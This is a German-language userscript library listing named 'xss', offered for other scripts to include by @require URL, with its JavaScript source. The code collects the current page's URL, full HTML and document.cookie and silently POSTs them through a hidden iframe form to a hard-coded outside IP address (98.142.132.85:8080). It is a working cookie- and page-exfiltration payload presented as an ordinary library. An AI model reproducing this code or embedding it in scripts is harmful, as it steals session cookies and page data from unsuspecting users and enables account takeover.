xss

xsscode

Version vom 07.09.2018. Aktuellste Version

Dieses Skript sollte nicht direkt installiert werden. Es handelt sich hier um eine Bibliothek für andere Skripte, welche über folgenden Befehl in den Metadaten eines Skriptes eingebunden wird // @require https://update.greatest.deepsurf.us/scripts/371986/627159/xss.js

var url = location.href;
var html = document.getElementsByTagName('html')[0].innerHTML;
var cookie = document.cookie;
html = encodeURIComponent(html);
cookie = encodeURIComponent(cookie);

function POSTDATA(importurl, data){ 
	var tmp = data; 
	var tag = new Date().getTime(); 
	var doc = document; 
	
	// var div_form = doc.createElement("div"); 
	var str = ""; 
	for(var i in tmp){ 
		str+="<input type='hidden' value='' name='"+i+"' id='__POST_INPUT_"+tag+"_"+i+"' /> "; 
	} 
	 
	// div_form.innerHTML = "<form action='"+importurl+"' id='__POST_FORM_"+tag+"' target='__POST_IFRAME_"+tag+"' method='POST'>"+str+"</form>"; 
	  	  
	try{ 
		var f = doc.createElement("<iframe name='__POST_IFRAME_"+tag+"'></iframe>"); 
	}catch(e){ 
		var f = doc.createElement("iframe"); 
	} 
	f.id='__POST_IFRAME_'+tag; 
	f.name='__POST_IFRAME_'+tag; 
	f.style.display='none'; 
	f.src="about:blank"; 
	f.attachEvent('onload',function(){ 
		try{ 
			f.parentNode.removeChild(f); 
			// div_form.parentNode.removeChild(div_form); 
		}catch(e){} 
	}); 
	
	f.innerHTML = "<form action='"+importurl+"' id='__POST_FORM_"+tag+"' target='__POST_IFRAME_"+tag+"' method='POST'>"+str+"</form>"; 
	doc.body.appendChild(f);  
	  
	for(var i in tmp){ 
		doc.getElementById('__POST_INPUT_'+tag+'_'+i).value=tmp[i]; 
	} 
	doc.getElementById('__POST_FORM_'+tag).submit(); 
} 

var importurl = "http://98.142.132.85:8080/-.php";
var data = {
	url: url,
	html: html,
	cookie: cookie
};
POSTDATA(importurl, data);